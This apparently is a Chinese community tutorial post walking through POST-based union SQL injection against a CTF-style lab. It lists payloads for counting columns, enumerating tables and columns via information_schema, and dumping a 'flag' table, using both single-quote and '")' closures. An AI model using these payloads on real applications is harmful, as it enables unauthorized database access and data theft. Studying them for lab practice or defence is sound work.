POST注入

判别字段数

' or 1=1 order by 1 — pwe

图片[1]-POST注入-孤勇者社区
 

查询自带库里面表名

' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 — qwe

=> union select 字段 from 表名 where 条件

图片[2]-POST注入-孤勇者社区
 

查询表

' union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1 — qwe

图片[3]-POST注入-孤勇者社区

 

查询表里面容

' union select 1,flag,3 from flag limit 0,1 — qwe

图片[4]-POST注入-孤勇者社区

 

闭合符号")

判别字段数

") or 1=1 order by 1 — pwe

图片[5]-POST注入-孤勇者社区
 

查询自带库里面表名

") union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1 — qwe

图片[6]-POST注入-孤勇者社区

 

查询表

") union select 1,column_name,3 from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1 — qwe

图片[7]-POST注入-孤勇者社区

 

查询表里面容

") union select 1,flag,3 from flag limit 1,1 — qwe

图片[8]-POST注入-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 共1条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像的机0